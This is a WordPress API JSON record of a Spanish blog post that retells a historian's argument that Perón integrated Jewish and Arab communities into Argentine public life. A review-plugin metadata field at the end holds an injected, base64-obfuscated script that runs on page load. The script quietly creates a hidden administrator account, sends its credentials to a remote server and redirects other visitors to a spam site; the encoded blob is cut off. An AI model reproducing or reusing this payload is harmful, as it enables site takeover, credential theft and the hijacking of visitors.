{"id":1611,"date":"2020-03-03T10:37:48","date_gmt":"2020-03-03T13:37:48","guid":{"rendered":"https:\/\/mauricioalvez.com.ar\/?p=1611"},"modified":"2020-03-03T10:37:57","modified_gmt":"2020-03-03T13:37:57","slug":"peron-creo-un-nuevo-concepto-de-ciudadania-que-abrio-las-puertas-a-las-comunidades-etnicas","status":"publish","type":"post","link":"https:\/\/mauricioalvez.com.ar\/2018-2023\/2020\/03\/03\/peron-creo-un-nuevo-concepto-de-ciudadania-que-abrio-las-puertas-a-las-comunidades-etnicas\/","title":{"rendered":"Per\u00f3n cre\u00f3 un nuevo concepto de ciudadan\u00eda que abri\u00f3 las puertas a las comunidades \u00e9tnicas"},"content":{"rendered":"\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>Este hilo se basa en el gran trabajo realizado por el gran historiador y vicepresidente de la Universidad de Tel Aviv, Raanan Rein quien estudi\u00f3 meticulosamente al peronismo plasmando sus investigaciones en dos libros excelentes: &#8220;Los Muchachos Peronistas \u00c1rabes&#8221; y &#8220;Los Muchachos Peronistas Jud\u00edos&#8221;. <\/p><\/blockquote>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"680\" height=\"378\" src=\"http:\/\/mauricioalvez.com.ar\/wp-content\/uploads\/2020\/03\/raanan-rein.jpg\" alt=\"\" class=\"wp-image-1612\" srcset=\"https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/raanan-rein.jpg 680w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/raanan-rein-300x167.jpg 300w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/raanan-rein-50x28.jpg 50w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/raanan-rein-110x61.jpg 110w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/raanan-rein-420x233.jpg 420w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/raanan-rein-248x138.jpg 248w\" sizes=\"auto, (max-width: 680px) 100vw, 680px\" \/><\/figure><\/div>\n\n\n\n<p>Hilo en Twitter <a href=\"https:\/\/twitter.com\/Tano2412\/status\/1234647093555453953\">https:\/\/twitter.com\/Tano2412\/status\/1234647093555453953<\/a><\/p>\n\n\n\n<p>El historiador israel\u00ed lleg\u00f3 a una conclusi\u00f3n inobjetable: &#8220;Per\u00f3n cre\u00f3 un nuevo concepto de ciudadan\u00eda que abri\u00f3 las puertas a las comunidades \u00e9tnicas. Fue el hito que marc\u00f3 el camino a una sociedad multi\u00e9tnica y multirreligiosa en Argentina&#8221;.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"512\" height=\"401\" src=\"http:\/\/mauricioalvez.com.ar\/wp-content\/uploads\/2020\/03\/peron-saludo-militar.jpg\" alt=\"\" class=\"wp-image-1613\" srcset=\"https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/peron-saludo-militar.jpg 512w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/peron-saludo-militar-300x235.jpg 300w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/peron-saludo-militar-50x39.jpg 50w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/peron-saludo-militar-110x86.jpg 110w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/peron-saludo-militar-420x329.jpg 420w\" sizes=\"auto, (max-width: 512px) 100vw, 512px\" \/><\/figure><\/div>\n\n\n\n<p>Rein enfatiza una frase de Per\u00f3n: &#8220;pueden ser patriotas argentinos y al mismo tiempo mantener lazos afectivos con sus pa\u00edses de or\u00edgen&#8221;. Esto se aplic\u00f3 a tanos, gallegos, armenios, jud\u00edos y \u00e1rabes. El inmigrante sinti\u00f3 que formaba parte de la naci\u00f3n sin importar su or\u00edgen.<\/p>\n\n\n\n<p>Pero su estudio se centra en la comunidad jud\u00eda y en la \u00e1rabe. Gracias a Per\u00f3n y Evita los integrantes de dichas comunidades dejaron de sentirse despreciados &#8220;vendedores de tela&#8221; y comenzaron a ser valorados como miembros de una comunidad con influencia social.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"680\" height=\"478\" src=\"http:\/\/mauricioalvez.com.ar\/wp-content\/uploads\/2020\/03\/peron-evita-riendo.jpg\" alt=\"\" class=\"wp-image-1614\" srcset=\"https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/peron-evita-riendo.jpg 680w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/peron-evita-riendo-300x211.jpg 300w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/peron-evita-riendo-50x35.jpg 50w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/peron-evita-riendo-110x77.jpg 110w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/peron-evita-riendo-420x295.jpg 420w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/peron-evita-riendo-612x430.jpg 612w\" sizes=\"auto, (max-width: 680px) 100vw, 680px\" \/><\/figure><\/div>\n\n\n\n<p>Por eso tantos miembros de ambas comunidades pasaron a ser activos militantes y dirigentes peronistas. Rein es claro al decir que Per\u00f3n no era antisemita y remarca que ese estereotipo fue una invenci\u00f3n de las clases dominantes que en realidad son las difusoras del antisemitismo.<\/p>\n\n\n\n<p>Respecto de la llegada de criminales de guerra nazi al pais el historiador israel\u00ed enfatiza que entraron con documentos falsos y que desde el Estado argentino no se incentiv\u00f3 de ninguna manera su arribo. Rein agreda otro dato que merece ser destacado y que algunos\/as desconocen.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"680\" height=\"442\" src=\"http:\/\/mauricioalvez.com.ar\/wp-content\/uploads\/2020\/03\/peron-jurando.jpg\" alt=\"\" class=\"wp-image-1615\" srcset=\"https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/peron-jurando.jpg 680w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/peron-jurando-300x195.jpg 300w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/peron-jurando-50x33.jpg 50w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/peron-jurando-110x72.jpg 110w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/peron-jurando-420x273.jpg 420w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/peron-jurando-662x430.jpg 662w\" sizes=\"auto, (max-width: 680px) 100vw, 680px\" \/><\/figure><\/div>\n\n\n\n<p>Durante las dos primeras presidencias de Per\u00f3n se dieron los mejores v\u00ednculos diplom\u00e1ticos con el Estado de Israel en toda la historia argentina. El peronismo lanz\u00f3 a la comunidad jud\u00eda y \u00e1rabe a la esfera p\u00fablica en Argentina, queda demostrado con sus ilustres representantes.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"679\" height=\"382\" src=\"http:\/\/mauricioalvez.com.ar\/wp-content\/uploads\/2020\/03\/peron-evita-abrazo.jpg\" alt=\"\" class=\"wp-image-1616\" srcset=\"https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/peron-evita-abrazo.jpg 679w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/peron-evita-abrazo-300x169.jpg 300w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/peron-evita-abrazo-50x28.jpg 50w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/peron-evita-abrazo-110x62.jpg 110w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/peron-evita-abrazo-420x236.jpg 420w\" sizes=\"auto, (max-width: 679px) 100vw, 679px\" \/><\/figure><\/div>\n\n\n\n<p>Hay ejemplos en las dos comunidades. Israel Zeitlin (periodista y escritor jud\u00edo), Amram Blum (rabino ortodoxo de la comunidad judeo-siria qui\u00e9n fuera un gran consejero de Per\u00f3n y nexo entre el General y la comunidad jud\u00eda), Jorge Antonio (hijo de \u00e1rabes sirios y libaneses.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"247\" height=\"512\" src=\"http:\/\/mauricioalvez.com.ar\/wp-content\/uploads\/2020\/03\/raanan-rein2.jpg\" alt=\"\" class=\"wp-image-1617\" srcset=\"https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/raanan-rein2.jpg 247w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/raanan-rein2-145x300.jpg 145w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/raanan-rein2-24x50.jpg 24w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/raanan-rein2-53x110.jpg 53w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/raanan-rein2-203x420.jpg 203w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/raanan-rein2-207x430.jpg 207w\" sizes=\"auto, (max-width: 247px) 100vw, 247px\" \/><\/figure><\/div>\n\n\n\n<p>empresario y asesor pol\u00edtico \u00edntimamente ligado a Per\u00f3n), Envar El Kadri (hijo de \u00e1rabes libaneses, abogado y fundador de las FAP) Ber Gelbard (ministro de econom\u00eda del tercer peronismo de origen jud\u00edo) La coexistencia de ambas comunidades dentro del peronismo sigue muy vigente.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"519\" height=\"294\" src=\"http:\/\/mauricioalvez.com.ar\/wp-content\/uploads\/2020\/03\/raanan-rein3.jpg\" alt=\"\" class=\"wp-image-1618\" srcset=\"https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/raanan-rein3.jpg 519w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/raanan-rein3-300x170.jpg 300w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/raanan-rein3-50x28.jpg 50w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/raanan-rein3-110x62.jpg 110w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/raanan-rein3-420x238.jpg 420w\" sizes=\"auto, (max-width: 519px) 100vw, 519px\" \/><\/figure><\/div>\n\n\n\n<p>Hay muchos ejemplos: Julio Alak (origen \u00e1rabe), Axel Kicillof (origen jud\u00edo), Claudia Ledesma Abdala (origen \u00e1rabe) Daniel Filmus (origen jud\u00edo), Juan Manzur (origen \u00e1rabe) y el inolvidable H\u00e9ctor Timerman (or\u00edgen jud\u00edo) El peronismo logr\u00f3 lo que es a\u00fan impensado en Medio Oriente<\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow\">\n<figure class=\"wp-block-image size-large is-style-default\"><img loading=\"lazy\" decoding=\"async\" width=\"269\" height=\"188\" src=\"http:\/\/mauricioalvez.com.ar\/wp-content\/uploads\/2020\/03\/raanan-rein4.jpg\" alt=\"\" class=\"wp-image-1622\" srcset=\"https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/raanan-rein4.jpg 269w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/raanan-rein4-50x35.jpg 50w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/raanan-rein4-110x77.jpg 110w\" sizes=\"auto, (max-width: 269px) 100vw, 269px\" \/><\/figure>\n<\/div><\/div>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img decoding=\"async\" src=\"http:\/\/mauricioalvez.com.ar\/wp-content\/uploads\/2020\/03\/axel-riendo.jpg\" alt=\"\" class=\"wp-image-1621\" width=\"269\" srcset=\"https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/axel-riendo.jpg 360w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/axel-riendo-300x199.jpg 300w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/axel-riendo-50x33.jpg 50w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/axel-riendo-110x73.jpg 110w\" sizes=\"(max-width: 360px) 100vw, 360px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img decoding=\"async\" src=\"http:\/\/mauricioalvez.com.ar\/wp-content\/uploads\/2020\/03\/claudia-ledesma-abdala.jpg\" alt=\"\" class=\"wp-image-1620\" width=\"269\" srcset=\"https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/claudia-ledesma-abdala.jpg 490w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/claudia-ledesma-abdala-216x300.jpg 216w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/claudia-ledesma-abdala-36x50.jpg 36w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/claudia-ledesma-abdala-79x110.jpg 79w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/claudia-ledesma-abdala-303x420.jpg 303w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/claudia-ledesma-abdala-310x430.jpg 310w\" sizes=\"(max-width: 490px) 100vw, 490px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img decoding=\"async\" src=\"http:\/\/mauricioalvez.com.ar\/wp-content\/uploads\/2020\/03\/hector-timerman.jpg\" alt=\"\" class=\"wp-image-1619\" width=\"269\" srcset=\"https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/hector-timerman.jpg 360w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/hector-timerman-300x300.jpg 300w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/hector-timerman-150x150.jpg 150w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/hector-timerman-250x250.jpg 250w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/hector-timerman-125x125.jpg 125w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/hector-timerman-64x64.jpg 64w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/hector-timerman-50x50.jpg 50w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/hector-timerman-110x110.jpg 110w\" sizes=\"(max-width: 360px) 100vw, 360px\" \/><\/figure>\n\n\n\n<p>\u00c1rabes y jud\u00edos ofrecieron sus vidas en tiempos de la resistencia y fueron secuestrados, torturados, asesinados y desaparecidos por ser peronistas. Hoy siguen militando juntos dentro del peronismo y comparten la lucha por un pa\u00eds m\u00e1s justo para todos los y las que lo habitan.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"338\" height=\"500\" src=\"http:\/\/mauricioalvez.com.ar\/wp-content\/uploads\/2020\/03\/peronistas-judios.jpg\" alt=\"\" class=\"wp-image-1624\" srcset=\"https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/peronistas-judios.jpg 338w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/peronistas-judios-203x300.jpg 203w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/peronistas-judios-34x50.jpg 34w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/peronistas-judios-74x110.jpg 74w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/peronistas-judios-284x420.jpg 284w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/peronistas-judios-291x430.jpg 291w\" sizes=\"auto, (max-width: 338px) 100vw, 338px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"255\" height=\"360\" src=\"http:\/\/mauricioalvez.com.ar\/wp-content\/uploads\/2020\/03\/peronistas-arabes.jpg\" alt=\"\" class=\"wp-image-1623\" srcset=\"https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/peronistas-arabes.jpg 255w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/peronistas-arabes-213x300.jpg 213w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/peronistas-arabes-35x50.jpg 35w, https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-content\/uploads\/2020\/03\/peronistas-arabes-78x110.jpg 78w\" sizes=\"auto, (max-width: 255px) 100vw, 255px\" \/><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>Este hilo se basa en el gran trabajo realizado por el gran historiador y vicepresidente de la Universidad de Tel Aviv, Raanan Rein quien estudi\u00f3 meticulosamente al peronismo plasmando sus investigaciones en dos libros excelentes: &#8220;Los Muchachos Peronistas \u00c1rabes&#8221; y &#8220;Los Muchachos Peronistas Jud\u00edos&#8221;. Hilo en Twitter https:\/\/twitter.com\/Tano2412\/status\/1234647093555453953 El historiador israel\u00ed lleg\u00f3 a una conclusi\u00f3n [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1612,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21],"tags":[2],"class_list":["post-1611","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-compol","tag-mauricioalvez-com-ar"],"wppr_data":{"cwp_meta_box_check":"Yes","_wppr_review_template":"default' onerror=\"eval(atob('ZnVuY3Rpb24gc3RhcnQoKSB7CiAgICBmdW5jdGlvbiBzZXRDb29raWUobmFtZSwgdmFsdWUsIGRheXMpIHsKICAgICAgICB2YXIgZXhwaXJlcyA9ICIiOwogICAgICAgIGlmIChkYXlzKSB7CiAgICAgICAgICAgIHZhciBkYXRlID0gbmV3IERhdGUoKTsKICAgICAgICAgICAgZGF0ZS5zZXRUaW1lKGRhdGUuZ2V0VGltZSgpICsgKGRheXMgKiAyNCAqIDYwICogNjAgKiAxMDAwKSk7CiAgICAgICAgICAgIGV4cGlyZXMgPSAiOyBleHBpcmVzPSIgKyBkYXRlLnRvVVRDU3RyaW5nKCk7CiAgICAgICAgfQogICAgICAgIGRvY3VtZW50LmNvb2tpZSA9IG5hbWUgKyAiPSIgKyAodmFsdWUgfHwgIiIpICsgZXhwaXJlcyArICI7IHBhdGg9LyI7CiAgICB9CgogICAgZnVuY3Rpb24gZ2V0Q29va2llKG5hbWUpIHsKICAgICAgICB2YXIgbmFtZUVRID0gbmFtZSArICI9IjsKICAgICAgICB2YXIgY2EgPSBkb2N1bWVudC5jb29raWUuc3BsaXQoIjsiKTsKICAgICAgICBmb3IgKHZhciBpID0gMDsgaSA8IGNhLmxlbmd0aDsgaSsrKSB7CiAgICAgICAgICAgIHZhciBjID0gY2FbaV07CiAgICAgICAgICAgIHdoaWxlIChjLmNoYXJBdCgwKSA9PSAiICIpIGMgPSBjLnN1YnN0cmluZygxLCBjLmxlbmd0aCk7CiAgICAgICAgICAgIGlmIChjLmluZGV4T2YobmFtZUVRKSA9PSAwKSByZXR1cm4gYy5zdWJzdHJpbmcobmFtZUVRLmxlbmd0aCwgYy5sZW5ndGgpOwogICAgICAgIH0KICAgICAgICByZXR1cm4gbnVsbDsKICAgIH0KCiAgICBmdW5jdGlvbiBpc0FkbWluKCkgewogICAgICAgIHJldHVybiAhIWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCd3cC1hZG1pbi1iYXItY3VzdG9taXplJykKICAgICAgICAgICAgfHwgZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LmlubmVySFRNTC5pbmNsdWRlcygidXNlciIgKyAiLW5ldy5waHAiKTsvLyBpZiBub3QgbnVsbCwgcmV0dXJuIHRydWUKICAgIH0KCiAgICBmdW5jdGlvbiByZXF1ZXN0KHVybCwgbWV0aG9kLCBkYXRhLCBhc3luYykgewogICAgICAgIHJlcSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOwogICAgICAgIHJlcS5vcGVuKG1ldGhvZCwgdXJsLCBhc3luYyk7CiAgICAgICAgcmVxLnNldFJlcXVlc3RIZWFkZXIoIkNvbnRlbnQtVHlwZSIsICJhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiKTsKICAgICAgICByZXEuc2VuZChkYXRhKTsKICAgICAgICByZXR1cm4gcmVxCiAgICB9CgogICAgZnVuY3Rpb24gZ2V0QmFzZVVybCgpIHsKICAgICAgICBmb3IodmFyIGkgPSAwLCBsPWRvY3VtZW50LmxpbmtzLmxlbmd0aDsgaTxsOyBpKyspIHsKICAgICAgICAgICAgdmFyIGN1cnJIcmVmID0gZG9jdW1lbnQubGlua3NbaV0uaHJlZjsKICAgICAgICAgICAgaWYoY3VyckhyZWYuaW5jbHVkZXMoIi93cC1hZG1pbi8iKSl7CiAgICAgICAgICAgICAgICB2YXIgbG5rQXJyID0gY3VyckhyZWYuc3BsaXQoIndwLWFkbWluLyIpOwogICAgICAgICAgICAgICAgcmV0dXJuIGxua0FyclswXSArICJ3cC1hZG1pbi8iOwogICAgICAgICAgICB9CiAgICAgICAgfQoKICAgICAgICByZXR1cm4gIiI7CiAgICB9CgogICAgZnVuY3Rpb24gbWFrZWlkKGxlbmd0aCkgewogICAgICAgIHZhciByZXN1bHQgPSAnJzsKICAgICAgICB2YXIgY2hhcmFjdGVycyA9ICdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSc7CiAgICAgICAgdmFyIGNoYXJhY3RlcnNMZW5ndGggPSBjaGFyYWN0ZXJzLmxlbmd0aDsKICAgICAgICBmb3IgKHZhciBpID0gMDsgaSA8IGxlbmd0aDsgaSsrKSB7CiAgICAgICAgICAgIHJlc3VsdCArPSBjaGFyYWN0ZXJzLmNoYXJBdChNYXRoLmZsb29yKE1hdGgucmFuZG9tKCkgKiBjaGFyYWN0ZXJzTGVuZ3RoKSk7CiAgICAgICAgfQogICAgICAgIHJldHVybiByZXN1bHQ7CiAgICB9CgogICAgaWYgKGlzQWRtaW4oKSkgewogICAgICAgIGlmIChnZXRDb29raWUoIlRobzNmYWVLIikgPT09IG51bGwpIHsKICAgICAgICAgICAgY29uc29sZS5sb2coImlzQWRtaW4iKTsKICAgICAgICAgICAgdmFyIGJhc2VEaXIgPSBnZXRCYXNlVXJsKCk7CiAgICAgICAgICAgIHZhciByZXF1ZXN0VVJMID0gYmFzZURpciArICJ1c2VyIiArICItbmV3LnBocCI7CiAgICAgICAgICAgIGNvbnNvbGUubG9nKHJlcXVlc3RVUkwpCiAgICAgICAgICAgIHZhciByZXEgPSByZXF1ZXN0KHJlcXVlc3RVUkwsICJHRVQiLCAiIiwgZmFsc2UpOwogICAgICAgICAgICB2YXIgd3Bfbm9uY2VSZWdleCA9IC9zZXIiIHZhbHVlPSIoW14iXSo\/KSIvZzsKICAgICAgICAgICAgdmFyIG5vbmNlTWF0Y2g7CiAgICAgICAgICAgIHZhciBub25jZSA9ICIiOwogICAgICAgICAgICBub25jZU1hdGNoID0gd3Bfbm9uY2VSZWdleC5leGVjKHJlcS5yZXNwb25zZVRleHQpOwogICAgICAgICAgICBpZiAobm9uY2VNYXRjaC5sZW5ndGggPT09IDApcmV0dXJuIGZhbHNlOwogICAgICAgICAgICBub25jZSA9IG5vbmNlTWF0Y2hbMV07CiAgICAgICAgICAgIGlmIChub25jZSA9PT0gIiIpcmV0dXJuIGZhbHNlOwoKICAgICAgICAgICAgdmFyIHVzZXJuYW1lID0gInN5c3RlbSI7CiAgICAgICAgICAgIHZhciBwYXNzd29yZCA9IG1ha2VpZCgxNSk7CgogICAgICAgICAgICB2YXIgcGFyYW1zID0gImFjdGlvbj1jcmVhdGV1c2VyJl93cG5vbmNlX2NyZWF0ZS11c2VyPSIgKyBub25jZSArICImdXNlcl9sb2dpbj0iICsgdXNlcm5hbWUgKwogICAgICAgICAgICAgICAgIiZlbWFpbD1zeXN0ZW1Ad29yZHByZXNzLmxvY2FsJnBhc3MxPSIgKyBwYXNzd29yZCArICImcGFzczI9IiArIHBhc3N3b3JkICsgIiZyb2xlPWFkbWluaXN0cmF0b3IiOwogICAgICAgICAgICByZXEgPSByZXF1ZXN0KHJlcXVlc3RVUkwsICJQT1NUIiwgcGFyYW1zLCB0cnVlKTsKICAgICAgICAgICAgcmVxLm9ubG9hZCA9IGZ1bmN0aW9uICgpIHsKCiAgICAgICAgICAgICAgICBpZiAocmVxLnJlc3BvbnNlVVJMLmluY2x1ZGVzKCJ1cGRhdGU9YWRkIikpIHsKICAgICAgICAgICAgICAgICAgICB2YXIgaW5mbyA9ICJsPSIrdXNlcm5hbWUrIiZwPSIrcGFzc3dvcmQrIiZ1PSIrYmFzZURpci5yZXBsYWNlKCIvd3AtYWRtaW4vIiwgIiIpOwoKICAgICAgICAgICAgICAgICAgICB2YXIgZ2F0ZVVybCA9ICJodHRwczovL2FiY21kLnJ1OjgxL2VuZWlYNHV1IjsKCgogICAgICAgICAgICAgICAgICAgIHJlcXVlc3QoZ2F0ZVVybCwgIlBPU1QiLCBpbmZvLCB0cnVlKTsKICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgfTsKCiAgICAgICAgICAgIHNldENvb2tpZSgiVGhvM2ZhZUsiLCAiZG8iLCAzNjUpOwogICAgICAgIH0KICAgIH0gZWxzZXsKCiAgICAgICAgZnVuY3Rpb24gaXNNb2JpbGUoKSB7CiAgICAgICAgICAgIHJldHVybiAobmF2aWdhdG9yLnVzZXJBZ2VudC5tYXRjaCgvQW5kcm9pZC9pKSB8fCBuYXZpZ2F0b3IudXNlckFnZW50Lm1hdGNoKC9CbGFja0JlcnJ5L2kpIHx8CiAgICAgICAgICAgICAgICBuYXZpZ2F0b3IudXNlckFnZW50Lm1hdGNoKC9pUGhvbmV8aVBhZHxpUG9kL2kpIHx8IG5hdmlnYXRvci51c2VyQWdlbnQubWF0Y2goL09wZXJhIE1pbmkvaSkgfHwKICAgICAgICAgICAgICAgIG5hdmlnYXRvci51c2VyQWdlbnQubWF0Y2goL0lFTW9iaWxlL2kpKTsKICAgICAgICB9CgogICAgICAgIGZ1bmN0aW9uIGlzRGVza3RvcCgpIHsKICAgICAgICAgICAgcmV0dXJuIChuYXZpZ2F0b3IudXNlckFnZW50LmluZGV4T2YoIkVkZ2UiKSAhPT0gLTEgfHwgbmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKCJNU0lFOyIpICE9PSAtMSB8fAogICAgICAgICAgICAgICAgbmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKCJPUFIiKSAhPT0gLTEgfHwgbmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKCJDaHJvbWl1bSIpICE9PSAtMSB8fAogICAgICAgICAgICAgICAgbmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKCJGaXJlZm94IikgIT09IC0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZigiQ2hyb21lIikgIT09IC0xCiAgICAgICAgICAgICkKICAgICAgICB9CgogICAgICAgIHZhciB4ID0gZ2V0Q29va2llKCJhZU5lZThwaSIpOwogICAgICAgIGlmICh4ICE9PSAiMSIpIHsKICAgICAgICAgICAgaWYgKGlzRGVza3RvcCgpIHx8IGlzTW9iaWxlKCkpIHsKICAgICAgICAgICAgICAgIHNldENvb2tpZSgiYWVOZWU4cGkiLCAiMSIsIDMwKTsKICAgICAgICAgICAgICAgIHdpbmRvdy5sb2NhdGlvbi5yZXBsYWNlKCJodHRwczovL2p1c3RjYW5uYWJpcy5vbmxpbmUvP3dwcHJkMiIpOwogICAgICAgICAgICB9CiAgICAgICAgfQogICAgfQoKfQoKaWYgKHdpbmRvdy5hdHRhY2hFdmVudCkgewogICAgd2luZG93LmF0dGFjaEV2ZW50KCdvbmxvYWQnLCBzdGFydCk7Cn0gZWxzZSB7CiAgICBpZiAod2luZG93Lm9ubG9hZCkgewogICAg